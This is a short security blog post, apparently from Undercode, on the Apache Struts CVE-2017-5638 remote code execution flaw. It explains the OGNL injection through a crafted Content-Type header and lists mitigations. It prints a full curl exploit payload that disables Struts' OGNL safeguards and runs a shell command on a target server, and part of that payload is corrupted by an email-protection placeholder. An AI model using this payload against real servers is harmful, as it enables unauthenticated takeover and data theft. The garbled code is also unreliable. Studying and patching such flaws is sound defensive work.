Listen to this Post
How the mentioned CVE works:
The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts. The exploit is triggered by a malformed `Content-Type` HTTP header. When a request is sent with a crafted `Content-Type` value that contains malicious expressions, the flawed error handling mechanism incorrectly processes this header. Instead of throwing a standard error, the parser attempts to evaluate the injected expression as an Object-Graph Navigation Language (OGNL) command. OGNL is a powerful expression language integrated with Struts that allows for method execution and variable access. Since this evaluation occurs before any security validations, an attacker can embed OGNL expressions that execute arbitrary system commands on the server with the same privileges as the Struts application. This allows for complete server compromise without requiring authentication, making it a highly critical remote code execution flaw.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-showcase/fileupload/doUpload.action`
How Exploit:
Craft malicious Content-Type header.
Send HTTP request.
OGNL expression execution.
Arbitrary command execution.
Protection from this CVE
Update Struts version.
Use different parser.
Web Application Firewall.
Input validation filters.
Impact:
Remote Code Execution.
Full system compromise.
Data theft.
Service disruption.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

